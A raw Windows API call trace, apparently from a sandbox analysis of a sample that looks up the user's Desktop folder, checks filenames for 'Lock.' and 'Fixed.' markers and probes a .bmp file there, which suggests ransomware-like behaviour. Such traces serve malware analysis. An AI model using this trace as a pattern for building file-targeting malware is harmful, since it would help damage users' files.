[0162.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y-NIrDXo_nG.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0162.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-NIrDXo_nG.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0162.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NIrDXo_nG.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0162.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IrDXo_nG.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0162.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rDXo_nG.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0162.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DXo_nG.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0162.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xo_nG.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0162.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o_nG.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0162.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_nG.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0162.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nG.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0162.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0162.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0162.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0162.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0162.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0162.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0162.044] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0162.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0162.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0162.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0162.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0162.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0162.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bY-NIrDXo_nG.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0162.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y-NIrDXo_nG.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0162.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-NIrDXo_nG.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0162.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NIrDXo_nG.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0162.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IrDXo_nG.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0162.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rDXo_nG.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0162.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DXo_nG.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0162.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xo_nG.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0162.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o_nG.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0162.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_nG.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0162.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nG.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0162.045] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0162.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0162.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0162.045] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0162.045] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0162.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0162.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0162.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0162.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0162.045] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0162.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0162.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0162.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0162.046] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0162.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0162.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0162.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0162.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0162.046] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0162.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0162.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0162.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0162.046] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0162.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0162.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0162.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0162.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0162.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0162.047] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0162.047] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.047] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0162.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0162.047] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0162.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0162.047] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0162.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0162.047] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0162.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0162.047] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/bY-NIrDXo_nG.bmp", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccf87650, ftCreationTime.dwHighDateTime=0x1d4cb04, ftLastAccessTime.dwLowDateTime=0x96e0c9e0, ftLastAccessTime.dwHighDateTime=0x1d4cbaa, ftLastWriteTime.dwLowDateTime=0x96e0c9e0, ftLastWriteTime.dwHighDateTime=0x1d4cbaa, nFileSizeHigh=0x0, nFileSizeLow=0xc6da, dwReserved0=0x9d70006, dwReserved1=0xd738, cFileName="bY-NIrDXo_nG.bmp", cAlternateFileName="BY-NIR~1.BMP")) returned 0xaa5660 [0162.048] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0162.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0162.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0162.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0162.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0162.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0162.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.048] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0162.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0162.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0162.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0162.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0162.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0162.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0162.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0162.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0162.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0162.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0162.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0162.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0162.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0162.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0162.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0162.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0162.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0162.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0162.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0162.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0162.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.050] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0162.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0162.050] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0162.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0162.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0162.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0162.050] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0162.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0162.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0162.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0162.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0162.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0162.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0162.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0162.051] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0162.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0162.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0162.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0162.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0162.051] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0162.051] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0162.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0162.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0162.051] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0162.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0162.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0162.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0162.052] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0162.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0162.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0162.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0162.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0162.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0162.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0162.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0162.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0162.052] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0162.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0162.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0162.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0162.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0162.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0162.052] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0162.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0162.053] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0162.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0162.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0162.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0162.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0162.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0162.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0162.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0162.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0162.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0162.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0162.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0162.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0162.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0162.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0162.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0162.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0162.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0162.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0162.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0162.055] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0162.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0162.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0162.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0162.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0162.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0162.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0162.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0162.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0162.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0162.056] 